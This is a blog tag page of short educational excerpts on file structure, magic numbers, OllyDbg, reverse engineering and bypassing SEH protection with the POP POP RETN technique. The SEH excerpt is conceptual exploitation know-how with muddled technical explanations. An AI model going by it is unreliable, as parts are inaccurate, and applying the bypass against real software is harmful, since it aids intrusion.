Posts tagged with: malware analysis

MP3 File Structure

File structure is something that make up a file. File is the smaller form of a filesystem. A file can’t be called “file” when it is not structured. Structure of a file is important to make that file readable because when it is not properly structurized I bet the system won’t be able to read it. And I think there’s also a standarization of a file structure, so a pdf file named A will have the same structure as the B,C,D or the other pdf files. The file structure of each filetype is also different. An .avi files will have different file structure with a .doc file.
In this post I’ll try to explain about the structure of an mp3 file.   🙂

Continue Reading

The Magic Number

Hoho, In this post I’ll explain a thing called “Magic Number”. Can you guess already what it is? Some kind of number that have a magical spell in it? some kind of magic trick that use numbers as its media? or the others?

Unfortunately, “magic number” in this post is not a thing related to magic itself literally. This magic number is a thing related about a file format. Originally, this kind of term was used for a specific set of 2-byte identifiers at the beginning of a file, but since any undecoded binary sequence can be regarded as a number, any feature of a file format which uniquely distinguishes it can be used for identification. Identify what? to identify a file format of course. Continue Reading

More About SEH and SafeSEH

As explained before, SEH (Structured Exception Handling) is the protection integrated on a system of a software to handle the abnormal flow of the program that can caused the program to act abnormal too (crash, hang, etc). SEH will prevent the EIP to be overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software. This protection definitely forcing hackers to develop a technique to bypass the SEH protection. When this protection can be controlled, the execution process on the CPU also can be controlled easily like in the Direct Return Exploitation.


The most popular technique to bypass this protection is using the POP, POP, RETN technique. Basically stack in the memory is a structured memory consist of 32 bit virtual file. The first POP command will take out the topmost value layer of the virtual file to the other register on the memory. And the second POP command will take out the second layer of the stack on the memory. Finally the third command, RETN will be the first layer on the stack, so the system will start the execution process from that location depend on the memory address pointed by the RETN command. Continue Reading

Introduction to “OllyDbg”

In this post, we’ve learned about reverse engineering. What we will talk now is one of the tool used for that called OllyDbg.

Before discussing OllyDbg, we must know what is debugging. Debugging is a structured process to find and reduce the number of bugs or defects in a computer program and repair it. When there are a bug in a system, especially when there are lots of subsystem in it will make the debugging process become harder because a changes in one may cause bugs appear in the other.

To do this debugging process, we need a debugging tool called debugger. It is used to test and debug the program. It can see what activity a software runs on the memory. Based on that thing, we can see at what point a bug appear. OllyDbg, Debugger, and ImmunityDbg is the example of a debugger software. Continue Reading

“Reverse Engineering” at Glance

Lets talk about Reverse Engineering briefly, because this is also important thing to know when you want to become an expert hacker.

Reverse Engineering is an activity to discover the material how a something is made, how something is works and what is its purpose. In the other word, discovering the technological principles of something by analizing its structure, function and operation. Usually the thing that want to be reverse engineered is taken apart from its original form then analyze each part one by one throughly.

Continue Reading